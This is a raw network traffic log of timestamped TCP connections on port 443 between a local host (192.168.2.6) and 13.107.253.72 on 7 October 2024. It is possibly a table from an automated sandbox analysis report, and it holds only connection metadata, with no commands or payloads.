Oct 7, 2024 18:47:34.894927979 CEST	443	49722	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.906940937 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.906981945 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:34.907211065 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.907211065 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:34.907269001 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.024538040 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.024698973 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.024770021 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.024897099 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.024950027 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.024980068 CEST	49725	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.024996042 CEST	443	49725	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.027447939 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.027498007 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.027784109 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.027889967 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.027899027 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.139194012 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.139369965 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.139452934 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.139673948 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.139691114 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.139707088 CEST	49724	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.139712095 CEST	443	49724	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.144468069 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.144504070 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.144558907 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.144912958 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.144929886 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.615324020 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.615889072 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.616208076 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.626250982 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.626277924 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.627132893 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.627145052 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.629056931 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.629090071 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.629380941 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.629388094 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.629568100 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.629651070 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.629837036 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.629853010 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.662575960 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.663324118 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.663353920 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.664221048 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.664227962 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.755057096 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.755152941 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.755213976 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.755776882 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.755834103 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.755872011 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.756093979 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.756114006 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.756125927 CEST	49728	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.756133080 CEST	443	49728	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.758821011 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.758974075 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.759047031 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.763690948 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.763748884 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.763782024 CEST	49726	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.763798952 CEST	443	49726	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.766937017 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.766963959 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.766978025 CEST	49727	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.766984940 CEST	443	49727	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.768560886 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.768719912 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.768769979 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.769685030 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.769706964 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.769721031 CEST	49729	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.769726038 CEST	443	49729	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.789999008 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.797800064 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.797847986 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.797907114 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799457073 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799479008 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799523115 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.799547911 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.799570084 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799597979 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799808979 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799866915 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.799876928 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799916029 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.799932003 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.799947977 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.800262928 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.800267935 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.800332069 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.800354958 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.801245928 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.801268101 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.801326990 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.801608086 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.801634073 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.901144028 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.901299953 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.901355028 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.901429892 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.901453018 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.901463985 CEST	49730	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.901469946 CEST	443	49730	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.904274940 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.904324055 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:35.904381037 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.904505968 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:35.904515982 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.439666986 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.440232038 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.440301895 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.440645933 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.440659046 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.444756985 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.445091963 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.445130110 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.445383072 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.445389032 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.510411024 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.513315916 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.513775110 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.513803005 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.514216900 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.514226913 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.514462948 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.514502048 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.514956951 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.514969110 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.549276114 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.549345016 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.549428940 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.549642086 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.549681902 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.549710989 CEST	49733	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.549726009 CEST	443	49733	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.552716017 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.552761078 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.552853107 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.553028107 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.553035021 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.570147038 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.570225000 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.570456028 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.570503950 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.570503950 CEST	49731	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.570527077 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.570539951 CEST	443	49731	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.573091984 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.573123932 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.573333025 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.573379993 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.573390961 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.600025892 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.602066040 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.602093935 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.602478027 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.602487087 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718252897 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718337059 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718390942 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.718528032 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718556881 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.718575954 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718600988 CEST	49732	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.718606949 CEST	443	49732	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718683958 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.718843937 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.718843937 CEST	49734	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.718941927 CEST	443	49734	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.721993923 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722031116 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722104073 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722126007 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722212076 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722219944 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722223043 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722342014 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722368956 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722376108 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722419977 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722440004 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722456932 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722465038 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722472906 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.722474098 CEST	49735	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.722491026 CEST	443	49735	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.724389076 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.724427938 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:36.724539042 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.724661112 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:36.724668026 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.372343063 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.372814894 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.372823954 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.373492002 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.373497009 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.396235943 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.396704912 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.396717072 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.397275925 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.397281885 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.468904972 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.469708920 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.469778061 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.469832897 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.469846964 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.473129988 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.473525047 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.473619938 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.473985910 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.474001884 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.477468967 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.477770090 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.477787018 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.478148937 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.478153944 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.478380919 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.478442907 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.478486061 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.478620052 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.478636980 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.478646040 CEST	49737	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.478651047 CEST	443	49737	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.481347084 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.481380939 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.481443882 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.481551886 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.481559038 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.544887066 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.544959068 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.545003891 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.545238018 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.545253992 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.545263052 CEST	49738	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.545268059 CEST	443	49738	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.547847986 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.547899008 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.547964096 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.548134089 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.548141003 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.667336941 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.667418003 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.667465925 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.667613029 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.667650938 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.667700052 CEST	49740	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.667714119 CEST	443	49740	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.670475006 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.670568943 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.670655966 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.670830011 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.670861006 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.694741011 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.694919109 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.694991112 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.695127010 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.695127010 CEST	49739	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.695175886 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.695204973 CEST	443	49739	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.697829008 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.697875977 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.697937965 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.698090076 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.698107004 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.699440956 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.699525118 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.699572086 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.699651957 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.699673891 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.699687958 CEST	49741	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.699695110 CEST	443	49741	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.701898098 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.701920033 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:37.701968908 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.702207088 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:37.702220917 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.222928047 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.231414080 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.231432915 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.237607002 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.237632990 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.246053934 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.254148006 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.254199028 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.257272959 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.257287979 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.325323105 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.343630075 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.343696117 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.343789101 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.353148937 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.355799913 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.355851889 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.356009960 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.359364033 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.359435081 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.359764099 CEST	49744	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.359778881 CEST	443	49744	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.360116005 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.360116005 CEST	49743	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.360155106 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.360177040 CEST	443	49743	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.361104012 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.361124039 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.361643076 CEST	49742	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.361650944 CEST	443	49742	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.362271070 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.362296104 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.362597942 CEST	49745	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.362607002 CEST	443	49745	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.363002062 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.365443945 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.365466118 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.365823030 CEST	49746	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.365827084 CEST	443	49746	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.381386042 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.381454945 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.381527901 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.382112026 CEST	49747	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.382142067 CEST	443	49747	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.382766962 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.382814884 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.382872105 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.383151054 CEST	49748	443	192.168.2.6	13.107.253.72
Oct 7, 2024 18:47:38.383163929 CEST	443	49748	13.107.253.72	192.168.2.6
Oct 7, 2024 18:47:38.466917992 CEST	443	49745	13.107.253.72	192.168.2.6
